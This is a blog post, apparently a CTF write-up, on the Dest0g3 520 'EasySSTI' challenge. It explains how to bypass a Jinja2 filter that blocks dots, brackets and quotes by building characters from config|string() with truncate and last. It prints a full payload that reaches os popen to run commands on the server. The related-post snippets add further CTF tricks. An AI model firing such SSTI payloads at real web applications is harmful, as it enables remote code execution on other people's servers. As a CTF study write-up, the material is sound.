Dest0g3 520迎新赛 WEB EasySSTI

最新推荐文章于 2024-02-24 16:14:14 发布
最新推荐文章于 2024-02-24 16:14:14 发布
阅读量487 收藏 2
点赞数 1
分类专栏: BUUCTF Dest0g3 520迎新赛 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/125142777
版权

emmmm。。。。之前在做SSTI的时候没做出来,现在根据wp复现一下,这题说实话过滤做的确实挺过分的,百度能搜到的常规思路都被ban掉了
.和[]‘"之类常用的东西都被ban的差不多了,测试下来唯一被留下来的一个过滤器逻辑和圆括号
关于过滤器,建议看这篇:
https://morblog.cc/posts/2946623354/
jinjia2环境很好判断,用到了里面的三个过滤器
attr(obj, name) 获取一个类的属性。
string(object) 转换为字符串输出
truncate(s, length=255, killwords=False, end=’…’, leeway=None)
返回被截断的字符串的复制。长度由第一个参数指定,默认为255。如果第二个参数为真,过滤器将最终删除文本。否则将丢弃最后一个单词。如果文本实际上被截断,它将附加一个省略号(“…”)。如果你想要一个不同于”…”的省略号您可以使用第三个参数指定它。仅超出第四个参数中给出的公差范围的字符串将不会被截断。
last(seq) 返回序列的最后一项,需要尽可能的对显式列表使用。
当时做的时候我搜到的wp都是用的list,但是用list有一个很麻烦的问题,emmmm。。。。,[]下标和’'""都被过滤了,当时我的思路就在这断了
看到wp的时候我惊了,直接拿string做截取,还是做的题少了
payload的基础结构:config|string()|truncate(75,True,app|string())|last,是的就是这个,截取下来的就是一个_
对照truncate的文档
killwords=True
app|string()是空,那么这个结构的把config转为字符串,然后用truncate截取出第75位的_,所有的字符都通过这个方式拼出来
查看当前类,如果没有过滤的话,应该是self.__class__
按照payload的格式拼接成:

{{self|attr(config|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(23,True,app|string())|last%2bconfig|string()|truncate(42,True,app|string())|last%2bconfig|string()|truncate(41,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last)}}

其实绕过了这个waf,就是随便构造了,最终payload:

{{self|attr(config|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(23,True,app|string())|last%2bconfig|string()|truncate(42,True,app|string())|last%2bconfig|string()|truncate(41,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last)|attr(config|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(34,True,app|string())|last|lower%2bconfig|string()|truncate(41,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(44,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last)|attr(config|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(22,True,app|string())|last%2bconfig|string()|truncate(34,True,app|string())|last|lower%2bconfig|string()|truncate(23,True,app|string())|last%2bconfig|string()|truncate(42,True,app|string())|last%2bconfig|string()|truncate(41,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(44,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last)()|attr(config|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(7,True,app|string())|last%2bconfig|string()|truncate(44,True,app|string())|last%2bconfig|string()|truncate(24,True,app|string())|last%2bconfig|string()|truncate(6,True,app|string())|last%2bconfig|string()|truncate(24,True,app|string())|last%2bconfig|string()|truncate(44,True,app|string())|last%2bconfig|string()|truncate(190,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last)(208)|attr(config|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(6,True,app|string())|last%2bconfig|string()|truncate(4,True,app|string())|last%2bconfig|string()|truncate(6,True,app|string())|last%2bconfig|string()|truncate(24,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last)|attr(config|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(7,True,app|string())|last%2bconfig|string()|truncate(42,True,app|string())|last%2bconfig|string()|truncate(3,True,app|string())|last%2bconfig|string()|truncate(34,True,app|string())|last|lower%2bconfig|string()|truncate(41,True,app|string())|last%2bconfig|string()|truncate(42,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last)|attr(config|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(7,True,app|string())|last%2bconfig|string()|truncate(44,True,app|string())|last%2bconfig|string()|truncate(24,True,app|string())|last%2bconfig|string()|truncate(6,True,app|string())|last%2bconfig|string()|truncate(24,True,app|string())|last%2bconfig|string()|truncate(44,True,app|string())|last%2bconfig|string()|truncate(190,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last%2bconfig|string()|truncate(75,True,app|string())|last)(config|string()|truncate(3,True,app|string())|last%2bconfig|string()|truncate(43,True,app|string())|last)|attr(config|string()|truncate(18,True,app|string())|last%2bconfig|string()|truncate(3,True,app|string())|last%2bconfig|string()|truncate(18,True,app|string())|last%2bconfig|string()|truncate(44,True,app|string())|last%2bconfig|string()|truncate(4,True,app|string())|last)(config|string()|truncate(23,True,app|string())|last%2bconfig|string()|truncate(41,True,app|string())|last%2bconfig|string()|truncate(24,True,app|string())|last%2bconfig|string()|truncate(8,True,app|string())|last%2bconfig|string()|truncate(280,True,app|string())|last%2bconfig|string()|truncate(5,True,app|string())|last%2bconfig|string()|truncate(42,True,app|string())|last%2bconfig|string()|truncate(41,True,app|string())|last%2bconfig|string()|truncate(7,True,app|string())|last)|attr(config|string()|truncate(19,True,app|string())|last%2bconfig|string()|truncate(44,True,app|string())|last%2bconfig|string()|truncate(41,True,app|string())|last%2bconfig|string()|truncate(21,True,app|string())|last)()}}

哎自己还是太菜了,对SSTI理解的不够深

显哥无敌
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[护网杯 2018]easy_tornado(SSTI服务器端模板注入)
weixin_45253573的博客
11-12 653
tornado Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。 可以考虑服务器端模板注入 参考SSTI完全学习 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty
CTFSHOW 愚人杯easy_ssti
SanKobe的博客
05-25 308
另外这道题刚开始的源码那块对"f"和"ge"进行了处理,我不知道在其他思路里会不会卡住,我试了下可以在语句的最后直接加上"ge"绕过。在页面上查catch_warning的位置,再查class的位置就能大概查到是第几个类了。是flask的模板,分析一下源码应该就是在/hello目录下有SSTI注入的漏洞。用ls查了一下当前目录,app.py 里也没啥有用信息,和压缩包里是一样的。进入hello目录下并照常走一下判断流程,发现应该是jinja2的模板。猜测了一下,应该是将语句中的"/"当成目录了。
Dest0g3 520迎新复现(思路演练)
最新发布
NYG694的博客
02-24 1021
这几个都不能实现绕过,所以就是报错,用数组就可以报错,这题让我想到了SICTF的oysterphp题目里面我一度想用数组绕过,发现会系统报错所以印象深刻,当然那后来使用prec回溯。想到一个出题点就是preg一个不允许单个/的出现,但多个/可以,不过这里前面的php协议就要和后半段分开来输入才能实现这个,都是我自己的想法可能没什么含金量哈哈。呃刚去看了下,好像很简单的,就是把原本的命令先进行取反再url编码一下再取反就可以了。网上的脚本一直躺着pharm里面,总算用上了,还是要常被,自己写还是有点费脑了。
Dest0g3 520迎新 writeup by 树木
JEWSWS的博客
05-29 3570
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
新版攻防世界easy_web-web进阶ssti绕过(太湖杯)
yuanxu8877的博客
11-29 1788
新版攻防世界easy_web-web进阶ssti绕过(太湖杯)
CTF真题-Dest0g3CTF2022招新
06-01
CTF真题-Dest0g3CTF2022招新,来自BUUCTF。
Dest0g3-Java部分1
08-03
【标题】:“Dest0g3-Java部分1”主要涉及的是Java安全相关的知识点,特别是关于Web应用程序中的漏洞利用。在描述中提到了SUSCTF 2022网络安全竞中的一些解题策略,其中涉及到Java反序列化漏洞、EL(Expression ...
oracle数据库设置db_recovery_file_dest_size参数为0
11-02
当你设置了归档路径,并且不希望使用闪回区域来存储归档日志时,可以将`db_recovery_file_dest_size`设置为0,这样Oracle就不会在这个位置创建或存储任何恢复文件。 设置`db_recovery_file_dest_size`为0的步骤如下...
DEST戴尔服务器硬件日志收集工具
04-02
1.本工具为DELL服务器官方硬件日志提取工具,不是安装程序,请直接运行"dsetreport.hta"即可,运行时长大约5~15分钟,运行期间请关闭杀软等; 2.本程序可以在不关机的情况下完成服务器错误日志的收集;...
UNCTF2022 部分writeup
weixin_41724843的博客
11-18 2102
UNCTF2022部分题目解析,记录学习。
Dest0g3 520迎新 个人复现Writeup
m0_61596829的博客
06-01 1532
Dest0g3 520迎新 Dest0g3首次招新啦! Dest0g3 Team现逐步发展到各大高校及安全公司均有成员分布,在过去的半年里先后取得L3HCTF第十、SCTF第六及SUSCTF第四的优异成绩。 首届Dest0g3 520迎新更加注重CTFer的基础知识面掌握程度,由易到难,适合各学习阶段选手参加,纯萌新水准。 Dest0g3期待更多新生力量的加入,如有意向请在后提交wp与简历,或联系@Dest0g3 Team (QQ:1115230222) 比时间:2022.5.20 10:
Dest0g3 520迎新WEB 无java部分 wp
m0_52199518的博客
05-29 1444
Dest0g3 520迎新 只写了web,勉勉强强拿了总榜58名,web分榜11名这个尴尬的名次,前面的师傅太强了 phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } 文件包含题,因为使用的是require_once(),所以不能直接读flag.php; 没有phpinfo信息,session没有开
BUU Dest0g3 520迎新 WEB writeup
weixin_43610673的博客
05-29 2065
WEB phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } require_once 绕过不能重复包含文件的限制 /?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/r
[Dest0g3 520迎新] 拿到WP还整了很久的Dest0g3_heap
weixin_52640415的博客
06-12 380
libc2.33 house of co......
护网杯 2018]easy_tornado 1--SSTI
cainiao17441898的博客
04-28 252
文章目录前言STEP1-收集下有用的信息STEP2-查找cookie值STEP3-用提示信息获得flag 前言 一道简单的SSTI题。 SSTI:服务端模板注入是由于服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而导致了敏感信息泄露、代码执行、GetShell 等问题。 STEP1-收集下有用的信息 打开后发现有三个文件,都打开看看。 提示说flag在flllllllllllllag文件里面。 render函数:render函数,能创
Dest0g3 520迎新Misc Pngenius WriteUp
weixin_46025603的博客
05-27 327
开局一张图片,老规矩binwalk分析一波。 binwalk 11.png 隐写了flag.txt,flag应该就在里面。 binwalk -e 11.png 把文件提取出来 压缩包先看看是不是伪加密,不然上下其手一番后,发现他是伪加密=_= 看来是真加密,下面想办法得到压缩包密码。 能开锁的除了钥匙,还有锤子呀_ 暴力破解一下,看着逐渐诡异的payload。。。此路不通,换个方法 那密码应该就在题目给的文件里。 再回头看看开局的图片,丢进stegsolve看看有没有LSB隐写 找到你啦! We.
Dest0g3 520迎新 writeup (misc部分 + web部分)
ShenZ的博客
05-30 2946
Dest0g3 520迎新 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
Dest0g3 520迎新】密码学部分Wp及LCG(线性同余生成器)攻击方法
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
05-30 1947
题目出自Dest0g3 520迎新,知识点包括RSA、AES、DLP、LCG等。 文章目录babyRSAbabyAESezDLPezStreamMr.Doctor babyRSA 题目代码: from Crypto.Util.number import bytes_to_long, getPrime from gmpy2 import next_prime p = getPrime(1024) q = next_prime(p) n = p*q flag = open('flag.txt', 'rb').
from Crypto.Util.number import * f = open('flag.txt', 'r') flag = f.read() f.close() assert flag[:8] == "Dest0g3{" 这段代码的作用
07-12
4. 使用断言语句(`assert`)检查变量 `flag` 的前8个字符是否等于 "Dest0g3{"。如果不相等,将引发异常。 综上所述,这段代码的目的是读取名为 'flag.txt' 的文件,并确保文件内容的前8个字符是 "Dest0g3{"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值